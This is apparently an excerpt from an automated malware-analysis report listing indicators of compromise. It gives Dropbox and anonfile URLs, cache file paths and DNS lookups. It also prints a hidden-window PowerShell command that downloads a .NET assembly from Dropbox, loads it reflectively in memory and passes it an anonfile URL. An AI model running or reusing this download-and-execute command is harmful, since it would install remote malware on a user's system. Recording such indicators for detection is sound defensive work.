Technical Information
- https://dl.dropbox.com/s/d33v1jwrny4gpc9/hpoyutmrw
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
- DNS ASK dl.##opbox.com
- DNS ASK dl.#####oxusercontent.com
- DNS ASK cd####.anonfile.com
- DNS ASK microsoft.com
- DNS ASK an###ile.com
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' [reflection.assembly]::load((New-Object Net.WebClient).DownloadData('https://dl.dropbox.com/s/d33v1jwrny4gpc9/hpoyUtmRw'));[sxT]::oEr('https://cdn-14.anonfile.com/v4fcL8a0o3/ce912dbe-1581987511...' (with hidden window)